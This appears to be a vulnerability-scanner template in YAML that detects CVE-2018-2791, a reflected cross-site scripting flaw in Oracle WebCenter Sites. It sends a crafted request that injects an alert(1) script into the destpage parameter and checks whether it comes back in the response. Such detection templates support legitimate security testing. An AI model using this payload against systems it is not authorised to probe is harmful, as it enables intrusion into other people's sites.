34 lines
995 B
YAML
34 lines
995 B
YAML
id: CVE-2018-2791
|
|
|
|
info:
|
|
name: Oracle WebCenter Sites XSS
|
|
author: madrobot
|
|
severity: high
|
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
|
|
tags: cve,cve2018,oracle,xss
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
|
|
cvss-score: 8.20
|
|
cve-id: CVE-2018-2791
|
|
reference:
|
|
- http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
|
|
- http://www.securitytracker.com/id/1040695
|
|
- http://www.securityfocus.com/bid/103800
|
|
- https://www.exploit-db.com/exploits/44752/
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<h1xxx<scriptalert(1)</script"
|
|
part: body
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header |